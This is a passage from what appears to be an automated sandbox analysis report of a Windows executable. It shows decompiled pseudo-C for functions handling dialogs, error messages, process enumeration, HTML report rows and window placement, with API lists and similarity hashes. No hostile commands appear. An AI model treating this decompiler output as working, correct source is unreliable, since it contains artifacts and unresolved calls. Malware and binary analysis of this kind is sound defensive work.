                                                                                                        0x004052e4
                                                                                                        0x004052e8
                                                                                                        0x004052f2

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memcpywcslen$_snwprintfmemset
                                                                                                        • String ID: %s (%s)
                                                                                                        • API String ID: 3979103747-1363028141
                                                                                                        • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                        • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                                                        • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                                                        • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040614F, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 78%
                                                                                                        			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v514;
				short _v516;
				void _v8710;
				short _v8712;
				int _t17;
				WCHAR* _t26;

				E0040B550(0x2204, __ecx);
				_v8712 = 0;
				memset( &_v8710, 0, 0x2000);
				_t17 = GetDlgCtrlID(_a4);
				_t34 = _t17;
				GetWindowTextW(_a4,  &_v8712, 0x1000);
				if(_t17 > 0 && _v8712 != 0) {
					_v516 = 0;
					memset( &_v514, 0, 0x1fe);
					GetClassNameW(_a4,  &_v516, 0xff);
					_t26 =  &_v516;
					_push(L"sysdatetimepick32");
					_push(_t26);
					L0040B278();
					if(_t26 != 0) {
						E00406025(_t34,  &_v8712);
					}
				}
				return 1;
			}









                                                                                                        0x00406157
                                                                                                        0x0040616d
                                                                                                        0x00406174
                                                                                                        0x0040617f
                                                                                                        0x00406185
                                                                                                        0x00406196
                                                                                                        0x0040619e
                                                                                                        0x004061b6
                                                                                                        0x004061bd
                                                                                                        0x004061d4
                                                                                                        0x004061da
                                                                                                        0x004061e0
                                                                                                        0x004061e5
                                                                                                        0x004061e6
                                                                                                        0x004061ef
                                                                                                        0x004061f9
                                                                                                        0x004061ff
                                                                                                        0x004061ef
                                                                                                        0x00406206

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                        • String ID: sysdatetimepick32
                                                                                                        • API String ID: 1028950076-4169760276
                                                                                                        • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                        • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                        • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                        • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                        0x00404706
                                                                                                        0x00404714
                                                                                                        0x0040471c
                                                                                                        0x00404721
                                                                                                        0x0040472b
                                                                                                        0x00404733
                                                                                                        0x00404735
                                                                                                        0x00404735
                                                                                                        0x00404733
                                                                                                        0x00404751
                                                                                                        0x00404780
                                                                                                        0x00404753
                                                                                                        0x0040475e
                                                                                                        0x00404766
                                                                                                        0x0040476c
                                                                                                        0x00404770
                                                                                                        0x00404770
                                                                                                        0x0040478a

                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                        • wcslen.MSVCRT ref: 00404756
                                                                                                        • wcscpy.MSVCRT ref: 00404766
                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                        • wcscpy.MSVCRT ref: 00404780
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                        • String ID: netmsg.dll
                                                                                                        • API String ID: 2767993716-3706735626
                                                                                                        • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                        • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                        • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                        • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                        0x0040598b
                                                                                                        0x0040598b
                                                                                                        0x0040599a
                                                                                                        0x004059ae
                                                                                                        0x004059b5
                                                                                                        0x004059c1
                                                                                                        0x004059c6
                                                                                                        0x004059cb
                                                                                                        0x004059ce
                                                                                                        0x00405a7b
                                                                                                        0x00405a7b
                                                                                                        0x004059d4
                                                                                                        0x004059d4
                                                                                                        0x004059dc
                                                                                                        0x004059ee
                                                                                                        0x00000000
                                                                                                        0x004059f0
                                                                                                        0x004059f0
                                                                                                        0x004059f6
                                                                                                        0x004059f7
                                                                                                        0x004059fa
                                                                                                        0x00405a03
                                                                                                        0x00405a2b
                                                                                                        0x00405a2e
                                                                                                        0x00405a3c
                                                                                                        0x00405a40
                                                                                                        0x00000000
                                                                                                        0x00405a42
                                                                                                        0x00405a42
                                                                                                        0x00405a54
                                                                                                        0x00405a59
                                                                                                        0x00405a5a
                                                                                                        0x00405a5a
                                                                                                        0x00405a61
                                                                                                        0x00405a69
                                                                                                        0x00405a7f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a69
                                                                                                        0x00405a05
                                                                                                        0x00405a0e
                                                                                                        0x00405a17
                                                                                                        0x00000000
                                                                                                        0x00405a19
                                                                                                        0x00405a19
                                                                                                        0x00405a1c
                                                                                                        0x00405a1d
                                                                                                        0x00405a20
                                                                                                        0x00405a29
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405a29
                                                                                                        0x00405a17
                                                                                                        0x00405a03
                                                                                                        0x00000000
                                                                                                        0x00405a6b
                                                                                                        0x00405a6e
                                                                                                        0x00405a72
                                                                                                        0x00405a72
                                                                                                        0x00000000
                                                                                                        0x004059d4
                                                                                                        0x00405a81
                                                                                                        0x00405a84
                                                                                                        0x00405a8f

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 004059B5
                                                                                                          • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                          • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                          • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                          • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                          • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                          • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                          • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                          • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                          • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                          • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                        • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                        • wcschr.MSVCRT ref: 00405A0E
                                                                                                        • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                        • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 768606695-0
                                                                                                        • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                        • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                        • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                        • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 64%
                                                                                                        			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                        0x00407639
                                                                                                        0x00407646
                                                                                                        0x00407647
                                                                                                        0x00407654
                                                                                                        0x0040765f
                                                                                                        0x0040765f
                                                                                                        0x0040766b
                                                                                                        0x0040766d
                                                                                                        0x00407672
                                                                                                        0x00407677
                                                                                                        0x0040767d
                                                                                                        0x00407680
                                                                                                        0x00407686
                                                                                                        0x00407691
                                                                                                        0x00407697
                                                                                                        0x00407699
                                                                                                        0x00407699
                                                                                                        0x0040769c
                                                                                                        0x0040769f
                                                                                                        0x004076a3
                                                                                                        0x004076a7
                                                                                                        0x004076ab
                                                                                                        0x004076b5
                                                                                                        0x004076be
                                                                                                        0x004076c8
                                                                                                        0x004076de
                                                                                                        0x004076ee
                                                                                                        0x004076f1
                                                                                                        0x004076f4
                                                                                                        0x004076fa
                                                                                                        0x00407708
                                                                                                        0x0040770e
                                                                                                        0x00407718
                                                                                                        0x0040771d
                                                                                                        0x00407723
                                                                                                        0x00407724
                                                                                                        0x00407727
                                                                                                        0x0040772c
                                                                                                        0x0040772f
                                                                                                        0x00407734
                                                                                                        0x0040773f
                                                                                                        0x00407744
                                                                                                        0x00407745
                                                                                                        0x0040767d
                                                                                                        0x00407760

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfwcscat
                                                                                                        • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                        • API String ID: 384018552-4153097237
                                                                                                        • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                        • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                        • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                        • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 42%
                                                                                                        			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                        0x0040605e
                                                                                                        0x00406061
                                                                                                        0x00406069
                                                                                                        0x00406074
                                                                                                        0x0040607a
                                                                                                        0x0040607e
                                                                                                        0x00406082
                                                                                                        0x00406148
                                                                                                        0x0040614e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00406088
                                                                                                        0x00406088
                                                                                                        0x00406093
                                                                                                        0x00406098
                                                                                                        0x0040609f
                                                                                                        0x004060ae
                                                                                                        0x004060b6
                                                                                                        0x004060be
                                                                                                        0x004060c6
                                                                                                        0x004060ca
                                                                                                        0x004060cf
                                                                                                        0x004060d7
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004060de
                                                                                                        0x00406129
                                                                                                        0x00406129
                                                                                                        0x0040612d
                                                                                                        0x0040612f
                                                                                                        0x00406130
                                                                                                        0x00406134
                                                                                                        0x00406137
                                                                                                        0x0040613c
                                                                                                        0x0040613c
                                                                                                        0x00000000
                                                                                                        0x0040612d
                                                                                                        0x004060e7
                                                                                                        0x004060f0
                                                                                                        0x004060f2
                                                                                                        0x004060f2
                                                                                                        0x004060f9
                                                                                                        0x004060fd
                                                                                                        0x00406102
                                                                                                        0x0040610c
                                                                                                        0x00406112
                                                                                                        0x00406117
                                                                                                        0x00406117
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406104
                                                                                                        0x00406102
                                                                                                        0x00406122
                                                                                                        0x00406128
                                                                                                        0x00000000
                                                                                                        0x0040613f
                                                                                                        0x0040613f
                                                                                                        0x00406140
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                        • String ID: 0$6
                                                                                                        • API String ID: 2029023288-3849865405
                                                                                                        • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                        • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                        • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                        • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 82%
                                                                                                        			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                        0x00402bee
                                                                                                        0x00402bf8
                                                                                                        0x00402cae
                                                                                                        0x00402c08
                                                                                                        0x00402c10
                                                                                                        0x00402c11
                                                                                                        0x00402c12
                                                                                                        0x00402c13
                                                                                                        0x00402c20
                                                                                                        0x00402c27
                                                                                                        0x00402c2e
                                                                                                        0x00402c30
                                                                                                        0x00402c37
                                                                                                        0x00402c4b
                                                                                                        0x00402c50
                                                                                                        0x00402c53
                                                                                                        0x00402c55
                                                                                                        0x00402c3e
                                                                                                        0x00402c3e
                                                                                                        0x00402c41
                                                                                                        0x00402c41
                                                                                                        0x00402c5a
                                                                                                        0x00402c60
                                                                                                        0x00402c65
                                                                                                        0x00402c68
                                                                                                        0x00402c6d
                                                                                                        0x00402c77
                                                                                                        0x00402c7c
                                                                                                        0x00402c7e
                                                                                                        0x00402c87
                                                                                                        0x00402ca5
                                                                                                        0x00402ca5
                                                                                                        0x00402c87
                                                                                                        0x00402c7c
                                                                                                        0x00402c6d
                                                                                                        0x00000000
                                                                                                        0x00402cac

                                                                                                        APIs
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                        • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000B.00000002.287305945.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 0000000B.00000002.287300268.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287315695.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287325226.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 0000000B.00000002.287332421.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: MetricsSystem$Window
                                                                                                        • String ID:
                                                                                                        • API String ID: 1155976603-0
                                                                                                        • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                        • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                        • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                        • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 100%
                                                                                                        			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
